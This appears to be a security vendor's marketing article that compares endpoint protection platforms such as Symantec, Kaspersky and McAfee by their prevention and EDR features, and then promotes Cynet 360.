Endpoint Protection Platforms (EPP) are essential to defend your organization’s workstations, mobile devices, servers and containers. Modern endpoint security solutions include advanced preventative measures, such as Next-Generation Antivirus which can block both known and unknown malware, and active defensive measures known as Endpoint Detection and Response (EDR).
In this page we’ll help you understand the criteria for selecting and evaluating EPPs, and review the top 5 EPP solutions, breaking down their capabilities into preventive and EDR features.
If you want to learn about Extended Detection and Response (XDR), the next stage in the evolution of EPP and EDR, click here.
In this article you will learn:
EPP solutions include the following features and capabilities:
|Malware protection||Protects against known and unknown malware variants.|
|Protection from exploits||Prevents zero-day vulnerabilities and known software vulnerabilities|
|Email threats protection||Scans email attachments, detects and blocks malicious payloads|
|Downloads protection||Prevents unintentional user download of malicious files and drive-by downloads|
|Application Control||Enables whitelisting and blacklisting of applications on the endpoint|
|Behavior Analysis||Monitors behavior of the endpoint and uses machine learning techniques to identify suspicious activity|
|Endpoint Detection and Response (EDR)||Provides visibility into security incidents on the endpoint and gives security teams the tools to investigate and respond to them|
|Data Loss Prevention (DLP)||Prevents insider threats focused on data theft and exfiltration attempts by external attackers|
Operating system support: Windows, Mac, Linux
Prevention features: Next-Generation Antivirus (NGAV) that blocks malware, exploits, LOLBins, Macros, malicious scripts, and other malicious payloads. Zero-day protection using User and Entity Behavior Analytics (UEBA) to detect and block suspicious activity. Asset management, endpoint vulnerability assessments and application control, with auditing, logging and monitoring. Deception technology lures attackers to a honeypot, gathering useful intelligence about attack techniques. Network analytics identifies lateral movement, suspicious connections and logins.
EDR features: Advanced endpoint threat detection predicts attacker behavior based on continuous monitoring of endpoints and behavioral analysis. Searches and reviews historic or current incident data on endpoints to help investigate threats and validate alerts, for faster remediation. Automatic response orchestration and manual remediation of threats on endpoints. Deployment across thousands of endpoints within two hours.
Operating system support: Windows 7, 8, 10, Windows Server 2012, 2016, 2019, MacOS, Azure, Amazon Workspaces, VMware WS, ESX, ESXi, XenServer, Oracle VirtualBox
Prevention features: Antivirus, firewall and intrusion prevention, application and device control including file, registry and device access, application whitelisting and blacklisting, automated device erasure, enforcing policy on hosts, system lockdown.
EDR features: Symantec Endpoint Protection offers Targeted Attack Analytics (TAA) with local and global telemetry, machine learning analysis of device behavior, threat intelligence. Assist with attack investigation, containment and resolution.
Operating system support: Windows, Linux, MacOS
Prevention features: Kaspersky Endpoint Security offers mobile threat defense, security policy management, role-based access control (RBAC), adaptive anomaly control, encryption management, vulnerability and exploit prevention, security for web gateways and email servers, ransomware protection, application control, whitelisting and blacklisting, operating system and third-party software installation.
EDR features (EDR offered as separate product):
Operating system support: Windows XP, Vista, 7, 8, 10, Windows Server 2003, 2008, 2012, 2016, 2019, any virtualization platform running these operating systems.
Prevention features: McAfee EndPoint Security offers behavior classification for detecting zero-day threats, adaptive scanning for malware and other threats, next-gen anti-malware engine, safe browsing with web protection and filtering, prevents ransomware and grayware, integrated firewall blocks network attacks,
Operating system support: Windows, Linux, MacOS, Virtualization
EDR features: Tracks all activity on endpoints, contextualizes and identifies suspicious activity in real time, enables rapid response and rollback to last known good configuration, advanced threat hunting with full context of security incident forensics.
Operating system support: Windows and MacOs
EDR features (EDR offered as separate product):
Don’t take vendor claims as a given. Take your EPP solution of choice for a spin before you by. Try some of these to test EPP capabilities for yourself:
Cynet 360 is a security solution that includes a complete EPP offering, including NGAV, device firewall, advanced EDR capabilities and automated incident response. Cynet 360 is a complete security solution that goes beyond endpoint protection, offering network analytics, UEBA and deception technology.
Cynet’s platform includes:
Learn more about the Cynet 360 security platform.